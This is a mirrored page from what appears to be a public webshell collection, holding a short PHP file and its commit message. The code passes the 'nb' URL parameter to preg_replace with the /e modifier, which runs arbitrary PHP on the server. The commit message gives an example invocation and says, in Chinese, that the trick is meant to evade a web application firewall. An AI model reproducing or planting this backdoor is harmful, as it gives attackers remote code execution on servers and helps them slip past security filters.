mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
67733cfcdc
use: http://xxx.xxx.xx/xxx.php?nb=phpinfo() form: WX公众号 “ 渗透云笔记” Sigsh 新年从过狗开始
12 lines
180 B
PHP
12 lines
180 B
PHP
<?php
|
|
class SBdog{
|
|
public $x;
|
|
function dog(){
|
|
$this->x=$_GET['nb'];
|
|
}
|
|
}
|
|
$class=new SBdog();
|
|
$class->dog();
|
|
$a=$class->x;
|
|
preg_replace("/dog/e", $a, "I am a sb dog");
|
|
?>
|